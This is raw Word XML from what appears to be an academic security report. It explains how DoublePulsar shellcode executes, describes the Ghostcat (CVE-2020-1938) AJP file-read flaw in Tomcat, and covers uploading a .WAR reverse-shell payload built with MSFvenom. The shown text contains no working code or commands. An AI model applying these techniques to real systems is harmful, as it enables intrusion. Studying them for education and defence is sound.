            <wp:effectExtent l="19050" t="19050" r="18415" b="22225"/>
            <wp:docPr id="760259152" name="Picture 76025915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52" name="Picture 760259152" descr="Diagram&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId50"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="7957346" cy="4789915"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="accent1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="128B6CFD" w14:textId="36D3BEF6" w:rsidR="009306E9" w:rsidRDefault="009A4B04" w:rsidP="00991450">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="130" w:name="_Toc111363599"/>
      <w:bookmarkStart w:id="131" w:name="_Toc111363736"/>
      <w:bookmarkStart w:id="132" w:name="_Toc111981760"/>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>35</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t>: Insertion of DoublePulsar</w:t>
      </w:r>
      <w:bookmarkEnd w:id="130"/>
      <w:bookmarkEnd w:id="131"/>
      <w:bookmarkEnd w:id="132"/>
    </w:p>
    <w:p w14:paraId="1271F4C5" w14:textId="5B623870" w:rsidR="00111097" w:rsidRDefault="00111097" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="147F6D26" w14:textId="7DF5891A" w:rsidR="008A622B" w:rsidRDefault="008A622B" w:rsidP="009813B9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:ind w:left="851"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251532288" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="020B87E9" wp14:editId="61602986">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>4998912</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>762411</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3467511" cy="1776682"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="14605"/>
            <wp:wrapNone/>
            <wp:docPr id="760259157" name="Picture 760259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51">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect r="6094" b="5927"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3479812" cy="1782985"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
                      <a:solidFill>
                        <a:srgbClr val="C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4B04">
        <w:t xml:space="preserve">The srvnet connections </w:t>
      </w:r>
      <w:r w:rsidR="0021473A">
        <w:t>close</w:t>
      </w:r>
      <w:r w:rsidR="009A4B04">
        <w:t xml:space="preserve"> with </w:t>
      </w:r>
      <w:r w:rsidR="0021473A">
        <w:t>every</w:t>
      </w:r>
      <w:r w:rsidR="009A4B04">
        <w:t xml:space="preserve"> srvnet connection</w:t>
      </w:r>
      <w:r w:rsidR="00C61E5D">
        <w:t xml:space="preserve">’s HandlerFunction pointing </w:t>
      </w:r>
      <w:r w:rsidR="0021473A">
        <w:t>to</w:t>
      </w:r>
      <w:r w:rsidR="00C61E5D">
        <w:t xml:space="preserve"> SRVNET_RECV having been executed with the overflow connection pointing to the fake struct in HAL’s Heap. When the HandlerFunction is executed the shellcode function is called</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="621C0564" w14:textId="01867307" w:rsidR="009A4B04" w:rsidRDefault="008A622B" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251541504" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1DF79136" wp14:editId="614356A7">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:align>center</wp:align>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>94844</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="742849" cy="283558"/>
                <wp:effectExtent l="0" t="19050" r="38735" b="40640"/>
                <wp:wrapNone/>
                <wp:docPr id="760259158" name="Arrow: Right 760259158"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="742849" cy="283558"/>
                        </a:xfrm>
                        <a:prstGeom prst="rightArrow">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3DD7C5" id="Arrow: Right 760259158" o:spid="_x0000_s1026" type="#_x0000_t13" style="position:absolute;margin-left:0;margin-top:7.45pt;width:58.5pt;height:22.35pt;z-index:251541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" adj="17477" fillcolor="#c00000" strokecolor="#c00000" strokeweight="1pt">
                <w10:wrap anchorx="margin"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00C61E5D" w:rsidRPr="009306E9">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="419B2587" wp14:editId="3642E5B4">
            <wp:extent cx="6677779" cy="4379843"/>
            <wp:effectExtent l="19050" t="19050" r="27940" b="20955"/>
            <wp:docPr id="760259151" name="Picture 76025915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51" name="Picture 760259151" descr="Diagram&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId52"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6757325" cy="4432016"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="accent1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="52D414A4" w14:textId="5A86D3BC" w:rsidR="00C61E5D" w:rsidRPr="009306E9" w:rsidRDefault="00C61E5D" w:rsidP="00991450">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="133" w:name="_Toc111363600"/>
      <w:bookmarkStart w:id="134" w:name="_Toc111363737"/>
      <w:bookmarkStart w:id="135" w:name="_Toc111981761"/>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>36</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t>: HandlerFunction executes shellcode</w:t>
      </w:r>
      <w:bookmarkEnd w:id="133"/>
      <w:bookmarkEnd w:id="134"/>
      <w:bookmarkEnd w:id="135"/>
    </w:p>
    <w:p w14:paraId="6DD628A6" w14:textId="77777777" w:rsidR="007B24F0" w:rsidRDefault="007B24F0" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:sectPr w:rsidR="007B24F0" w:rsidSect="007B24F0">
          <w:pgSz w:w="16838" w:h="11906" w:orient="landscape"/>
          <w:pgMar w:top="1440" w:right="1440" w:bottom="1440" w:left="1440" w:header="708" w:footer="708" w:gutter="0"/>
          <w:cols w:space="708"/>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="731001EF" w14:textId="0F1EF6FD" w:rsidR="00CB3C2D" w:rsidRDefault="00A109D9" w:rsidP="00991450">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
      <w:bookmarkStart w:id="136" w:name="_Toc113190712"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>2.</w:t>
      </w:r>
      <w:r w:rsidR="003F0C44">
        <w:t>8</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00CB3C2D" w:rsidRPr="00744816">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>DoublePulsar</w:t>
      </w:r>
      <w:bookmarkEnd w:id="136"/>
    </w:p>
    <w:p w14:paraId="31F60FFE" w14:textId="4A9DD01A" w:rsidR="00CB3C2D" w:rsidRPr="00CB3C2D" w:rsidRDefault="00422C1C" w:rsidP="00CB3C2D">
      <w:r>
        <w:t xml:space="preserve">Compromised systems are vulnerable to DoublePulsar, a persistent backdoor that permits access and allows code to be executed. Attackers use this to compromise the system further by installing additional malware </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:color w:val="000000"/>
          </w:rPr>
          <w:tag w:val="MENDELEY_CITATION_v3_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"/>
          <w:id w:val="-824742106"/>
          <w:placeholder>
            <w:docPart w:val="DefaultPlaceholder_-1854013440"/>
          </w:placeholder>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidR="00663E33" w:rsidRPr="00663E33">
            <w:rPr>
              <w:color w:val="000000"/>
            </w:rPr>
            <w:t>[41]</w:t>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51828974" w14:textId="2BAE2F77" w:rsidR="003E621F" w:rsidRDefault="00CB3C2D" w:rsidP="00991450">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
      <w:bookmarkStart w:id="137" w:name="_Toc113190713"/>
      <w:r>
        <w:t>2.9</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00A37448">
        <w:t>Ghostcat</w:t>
      </w:r>
      <w:r w:rsidR="00185EC5">
        <w:t xml:space="preserve"> – CVE-2020-1938</w:t>
      </w:r>
      <w:bookmarkEnd w:id="137"/>
    </w:p>
    <w:p w14:paraId="3B40E1E7" w14:textId="24D1001D" w:rsidR="00386C00" w:rsidRDefault="003E621F" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t>One of the most popular</w:t>
      </w:r>
      <w:r w:rsidR="007262DA">
        <w:t xml:space="preserve"> open</w:t>
      </w:r>
      <w:r w:rsidR="005B60FF">
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="007262DA">
        <w:t>source</w:t>
      </w:r>
      <w:r w:rsidR="000C6DFE">
        <w:t>, open development,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Java Middleware servers is known as Tomcat and has been on the market since November 1998. </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:color w:val="000000"/>
          </w:rPr>
          <w:tag w:val="MENDELEY_CITATION_v3_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"/>
          <w:id w:val="-359287866"/>
          <w:placeholder>
            <w:docPart w:val="DefaultPlaceholder_-1854013440"/>
          </w:placeholder>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidR="00663E33" w:rsidRPr="00663E33">
            <w:rPr>
              <w:color w:val="000000"/>
            </w:rPr>
            <w:t>[42], [43]</w:t>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BA83AB1" w14:textId="2F7865BC" w:rsidR="00091329" w:rsidRDefault="007844F9" w:rsidP="005B60FF">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
          <w:tab w:val="left" w:pos="7938"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t>Software lying between an OS and its running applications is known as middleware and functions as a translation layer that is hidden, enabling data management and communication for distributed applications. Tomcat can be found between the client’s browser HTML/</w:t>
      </w:r>
      <w:r w:rsidR="005B60FF">
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> layer and your server database layer and is still considered middleware despite not having the fully featured J2EE server. It performs requests such as web browser form submissions or returning dynamic web pages </w:t>
      </w:r>
      <w:r w:rsidR="00737973">
        <w:t>by means of</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> a ‘user’ profile </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:color w:val="000000"/>
          </w:rPr>
          <w:tag w:val="MENDELEY_CITATION_v3_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"/>
          <w:id w:val="303738089"/>
          <w:placeholder>
            <w:docPart w:val="1511413C552041E4AFC1546F8299E560"/>
          </w:placeholder>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidR="00663E33" w:rsidRPr="00663E33">
            <w:rPr>
              <w:color w:val="000000"/>
            </w:rPr>
            <w:t>[44]</w:t>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C36C205" w14:textId="77777777" w:rsidR="00091329" w:rsidRDefault="00091329" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">‘Catalina’ receives external requests and passes them to the corresponding web application to be processed, returning the results using a Tomcat channel. Tomcat has two default connectors configured: the Apache Jserv Protocol (AJP) and the Hypertext Transfer Protocol (HTTP) connector. The HTTP connector (processes HTTP Protocol requests HTTP/1.1) has a default listening address of 0.0.0.0 using port 8080. The AJP connector, a binary format performance optimised version of HTTP, (processes AJP Protocol requests AJP/1.3) has a default listening address of 0.0.0.0 using port 8009 and uses the Transmission Control Protocol (TCP). </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25E32A1C" w14:textId="104C558B" w:rsidR="007844F9" w:rsidRDefault="00091329" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">AJP’s main function is using reverse proxy scenarios whereby web servers communicate with servlet containers or application servers. </w:t>
      </w:r>
      <w:r w:rsidR="007844F9">
        <w:t xml:space="preserve">This means that whilst the </w:t>
      </w:r>
      <w:r w:rsidR="007844F9">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">HTTP connector is exposed to clients the AJP connector is used between the webserver (eg. Apache HTTPD) and the Tomcat server internally. Figure </w:t>
      </w:r>
      <w:r w:rsidR="005B60FF">
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidR="00475C95">
        <w:t>7</w:t>
      </w:r>
      <w:r w:rsidR="007844F9">
        <w:t xml:space="preserve"> illustrates how the Apache Tomcat Server works </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:color w:val="000000"/>
          </w:rPr>
          <w:tag w:val="MENDELEY_CITATION_v3_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"/>
          <w:id w:val="846979372"/>
          <w:placeholder>
            <w:docPart w:val="A6A01364A42641DC9865DC5FAC166B88"/>
          </w:placeholder>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidR="00663E33" w:rsidRPr="00663E33">
            <w:rPr>
              <w:color w:val="000000"/>
            </w:rPr>
            <w:t>[45]</w:t>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="007844F9">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="771B4F58" w14:textId="7BCD88A6" w:rsidR="0085081A" w:rsidRDefault="001E6514" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="001E6514">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="654EEF80" wp14:editId="32AEED2C">
            <wp:extent cx="3433297" cy="4236016"/>
            <wp:effectExtent l="19050" t="19050" r="15240" b="12700"/>
            <wp:docPr id="760259160" name="Picture 76025916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60" name="Picture 760259160" descr="Diagram&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId53"/>
                    <a:srcRect l="11330" t="5334" r="13812" b="12901"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3434196" cy="4237125"/>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17003614" w14:textId="50AD6039" w:rsidR="001E6514" w:rsidRDefault="001E6514" w:rsidP="00991450">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
      <w:bookmarkStart w:id="138" w:name="_Toc111363601"/>
      <w:bookmarkStart w:id="139" w:name="_Toc111363738"/>
      <w:bookmarkStart w:id="140" w:name="_Toc111981762"/>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>37</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t xml:space="preserve">: Apache Tomcat Server </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:i w:val="0"/>
            <w:color w:val="000000"/>
          </w:rPr>
          <w:tag w:val="MENDELEY_CITATION_v3_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"/>
          <w:id w:val="-1837214567"/>
          <w:placeholder>
            <w:docPart w:val="DefaultPlaceholder_-1854013440"/>
          </w:placeholder>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidR="00663E33" w:rsidRPr="00663E33">
            <w:rPr>
              <w:i w:val="0"/>
              <w:color w:val="000000"/>
            </w:rPr>
            <w:t>[45]</w:t>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:bookmarkEnd w:id="138"/>
      <w:bookmarkEnd w:id="139"/>
      <w:bookmarkEnd w:id="140"/>
    </w:p>
    <w:p w14:paraId="2DFD3D3D" w14:textId="77777777" w:rsidR="009B6933" w:rsidRPr="009405FE" w:rsidRDefault="009B6933" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D1E6611" w14:textId="77777777" w:rsidR="00143F4E" w:rsidRDefault="003A73B2" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Ghostcat is considered a Local File Inclusion (LFI) </w:t>
      </w:r>
      <w:r w:rsidR="00091329">
        <w:t xml:space="preserve">vulnerability </w:t>
      </w:r>
      <w:r w:rsidR="00143F4E">
        <w:t>that allows attackers to read the contents of source code and configuration files of all the deployed webapps. It should be noted that the AJP is not externally exposed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="356F2169" w14:textId="071E83EA" w:rsidR="00143F4E" w:rsidRDefault="003A73B2" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">However, if Tomcat implements AJP correctly it considers the connection has a higher level of trust when compared with </w:t>
      </w:r>
      <w:r w:rsidR="007844F9">
        <w:t>HTTP connections</w:t>
      </w:r>
      <w:r w:rsidR="00143F4E">
        <w:t xml:space="preserve">. The Tomcat server is vulnerable when the AJP connector is enabled and accessible to a service port. This is enabled by default, therefore, if Tomcat still has its default configuration of the AJP secret, no </w:t>
      </w:r>
      <w:r w:rsidR="00143F4E">
        <w:lastRenderedPageBreak/>
        <w:t>security check is made on requests on port 8009, so an unauthenticated attacker could access/read/write to the server</w:t>
      </w:r>
      <w:r w:rsidR="002C5A5D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:color w:val="000000"/>
          </w:rPr>
          <w:tag w:val="MENDELEY_CITATION_v3_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"/>
          <w:id w:val="1244764570"/>
          <w:placeholder>
            <w:docPart w:val="267845E1777A40589686BB6B3CD81B20"/>
          </w:placeholder>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidR="00663E33" w:rsidRPr="00663E33">
            <w:rPr>
              <w:color w:val="000000"/>
            </w:rPr>
            <w:t>[43]–[46]</w:t>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="00143F4E">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71A50120" w14:textId="5750F5E0" w:rsidR="00841A84" w:rsidRDefault="00CF2D57" w:rsidP="00FC3564">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="141" w:name="_Toc113190714"/>
      <w:r>
        <w:t>2.</w:t>
      </w:r>
      <w:r w:rsidR="00CB3C2D">
        <w:t>10</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00841A84">
        <w:t>Jerry with MSF</w:t>
      </w:r>
      <w:r w:rsidR="00777FAB">
        <w:t>v</w:t>
      </w:r>
      <w:r w:rsidR="00841A84">
        <w:t>enom on Apache Tomcat</w:t>
      </w:r>
      <w:bookmarkEnd w:id="141"/>
    </w:p>
    <w:p w14:paraId="472CF38E" w14:textId="175A61F9" w:rsidR="00A17814" w:rsidRDefault="00FF6BAC" w:rsidP="00CF2D57">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Versions 7-9 of the Apache Tomcat server contain vulnerabilities in the .WAR settings allowing a JSP backdoor to be uploaded and deployed. A .WAR file is created with a reverse shell payload. Once executed, the </w:t>
      </w:r>
      <w:r w:rsidR="00A17814">
        <w:t xml:space="preserve">attacking machine listener provides a reverse shell </w:t>
      </w:r>
      <w:r w:rsidR="0015359A">
        <w:t xml:space="preserve">(also known as connect-back) </w:t>
      </w:r>
      <w:r w:rsidR="00244D43">
        <w:t xml:space="preserve">where the target machine becomes a client connecting to a listener and the attacker receives the shell. Once control has been obtained, </w:t>
      </w:r>
      <w:r w:rsidR="00A17814">
        <w:t xml:space="preserve">privileges could be </w:t>
      </w:r>
      <w:r w:rsidR="0015359A">
        <w:t>elevated</w:t>
      </w:r>
      <w:r w:rsidR="00A17814">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:color w:val="000000"/>
          </w:rPr>
          <w:tag w:val="MENDELEY_CITATION_v3_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"/>
          <w:id w:val="-894585752"/>
          <w:placeholder>
            <w:docPart w:val="DefaultPlaceholder_-1854013440"/>
          </w:placeholder>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidR="00663E33" w:rsidRPr="00663E33">
            <w:rPr>
              <w:color w:val="000000"/>
            </w:rPr>
            <w:t>[47], [48]</w:t>
          </w:r>
        </w:sdtContent>
      </w:sdt>
    </w:p>
    <w:p w14:paraId="195B820D" w14:textId="2DE204A7" w:rsidR="00532CD4" w:rsidRDefault="00532CD4" w:rsidP="00CF2D57">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>In June 2015,</w:t>
      </w:r>
      <w:r w:rsidR="00CF4CE5">
        <w:t xml:space="preserve"> within the Metasploit Framework,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> msfpayload and msfencode were incorporated into a single Framework instance and renamed MSFvenom. </w:t>
      </w:r>
      <w:r w:rsidR="0015359A">
        <w:t xml:space="preserve">MSFvenom is a command line tool that generates and outputs different types of shell code. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>MSFvenom can be used to generate a Windows bind shel</w:t>
      </w:r>
      <w:r w:rsidR="00CF4CE5">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>l.</w:t>
      </w:r>
      <w:r w:rsidR="00CF4CE5" w:rsidRPr="00CF4CE5">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00CF4CE5">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>The options</w:t>
      </w:r>
      <w:r w:rsidR="00C75431">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> available</w:t>
      </w:r>
      <w:r w:rsidR="00CF4CE5">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> within smfvenom are set out in figure</w:t>
      </w:r>
      <w:r w:rsidR="00475C95">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00DA460C">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidR="00475C95">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r w:rsidR="00244D43">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:color w:val="000000"/>
          </w:rPr>
          <w:tag w:val="MENDELEY_CITATION_v3_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"/>
          <w:id w:val="1469774170"/>
          <w:placeholder>
            <w:docPart w:val="DefaultPlaceholder_-1854013440"/>
          </w:placeholder>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidR="00663E33" w:rsidRPr="00663E33">
            <w:rPr>
              <w:color w:val="000000"/>
            </w:rPr>
            <w:t>[49]–[51]</w:t>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="00B223E6">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="378A984C" w14:textId="222DA904" w:rsidR="00532CD4" w:rsidRDefault="00532CD4" w:rsidP="00C75431">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00532CD4">
        <w:rPr>
          <w:noProof/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6689BD10" wp14:editId="7FFFD792">
            <wp:extent cx="5795743" cy="4190452"/>
            <wp:effectExtent l="0" t="0" r="0" b="635"/>
            <wp:docPr id="36" name="Picture 36" descr="Text,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 timeline&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId54"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
